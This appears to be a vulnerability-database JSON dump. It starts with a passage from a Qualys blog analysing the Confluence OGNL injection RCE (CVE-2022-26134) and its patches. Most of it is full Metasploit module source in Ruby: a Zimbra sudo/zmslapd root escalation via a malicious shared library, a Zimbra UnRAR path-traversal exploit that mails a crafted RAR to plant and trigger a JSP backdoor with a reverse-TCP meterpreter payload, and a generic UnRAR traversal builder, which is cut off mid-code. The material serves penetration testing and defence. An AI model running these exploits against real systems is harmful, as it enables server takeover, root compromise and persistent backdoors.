com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. The execution flows up to ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)` where [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls` [translateVariables](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>)` method from [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class ` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)` which appears to be sink where the OGNL expression evaluation takes place invoking [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method from `OgnlValueStack` class `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)` and goes forward parsing the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### Source Code Analysis\n\nTo have a better understanding of the execution flow of this RCE vulnerability, it&#x27;s important that we dive into the source code of these classes:\n\nStarting off with [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\nThe `getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example : When a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` will consider everything before the last trailing slash as a namespace. Hence namespace `<RCE payload>` is created from the malicious requested URI.\n\nAs a result, the last trailing slash is an essential component for the exploit to work, if omitted the payload won\u2019t work.\n\nThis namespace is further utilized by `execute` method using `this.namespace` expression inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, `translateVariables` method from `TextParseUtil` class is called on `this.namespace` expression which converts all instances of `${...}` in expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nGoing forward with [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. Hence `\\\\` double backslash are used in above regex `\\\\$\\\\{([^}]*)\\\\}` to escape $, {, } characters.\n\nNext line `final Matcher m = p.matcher(expression);` uses matcher() method to search for the pattern in a string, for example : `${qualys.rce.payload}` pattern is created. \n\nFurther contents of round brackets are extracts from the regular expression `\\\\$\\\\{([^}]*)\\\\}` to match the expression using `final String g = m.group(1);` and pass it to `final Object o = stack.findValue(g);`\n\nAnd finally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker makes a malicious request URI `http://127.0.0.1:8090/${rce_payload}/`, first `${rce_payload}` gets translated into a namespace and then using` TextParseUtil.translateVariables` the payload is extracted and henceforth using `findValue` the OGNL expression `rce_payload` gets evaluated causing Remote Code Execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users shall see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using the Confluence application are strongly advised to upgrade their Confluence application to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later version to remediate CVE-2022-26134 vulnerability. More information regarding patching and workaround can be referred to [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\nConfluence Security Advisory**:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to** **[Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)**.**\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:51", "description": "This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T18:55:05", "type": "metasploit", "title": "Zimbra zmslapd arbitrary module load", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2023-03-27T15:46:07", "id": "MSF:EXPLOIT-LINUX-LOCAL-ZIMBRA_SLAPPER_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/zimbra_slapper_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/zimbra_slapper_priv_esc.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-27T19:45:47", "type": "metasploit", "title": "UnRAR Path Traversal in Zimbra (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-12-06T14:07:28", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Sanity check - the file shouldn't exist, but we should be able to do requests to the server\n if datastore['TRIGGER_PAYLOAD']\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::Unknown, 'Could not determine the public web path')\n end\n\n print_status('Checking the HTTP connection to the target')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')\n end\n\n # Break when the file successfully appears\n unless res.code == 404\n fail_with(Failure::Unknown, \"Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}\")\n end\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n\n # We flip this once we trigger the payload\n keep_sending = true\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n # Once we've triggered the payload, stop trying to\n if keep_sending\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n # Break when the file successfully appears\n if res.code == 200\n print_good('Successfully triggered the payload')\n keep_sending = false\n next\n end\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRAR'ed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. If a second file in the archive has the same name, it will be written to the symbolic link path.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T21:05:15", "type": "metasploit", "title": "UnRAR Path Traversal (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-22T18:46:50", "id": "MSF:EXPLOIT-LINUX-FILEFORMAT-UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/fileformat/unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that exploits CVE-2022-30333, which is a\n path-traversal vulnerability in unRAR that can extract an arbitrary file\n to an arbitrary location on a Linux system. UnRAR fixed this\n vulnerability in version 6.12 (open source version 6.1.7).\n\n The core issue is that when a symbolic link is unRAR'ed, Windows\n symbolic links are not properly validated on Linux systems and can\n therefore write a symbolic link that points anywhere on the filesystem.\n If a second file in the archive has the same name, it will be written\n to the symbolic link path.\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Generic RAR file', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\" - as well as a filename).']),\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)'])\n ]\n )\n end\n\n def exploit\n print_status(\"Target filename: #{datastore['TARGET_PATH']}\")\n\n if datastore['CUSTOM_PAYLOAD'].present?\n print_status(\"Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}\")\n payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])\n\n # Append a newline + NUL byte, since random data will be appended and we\n # don't want to break shellscripts\n payload_data.concat(\"\\n\\0\")\n 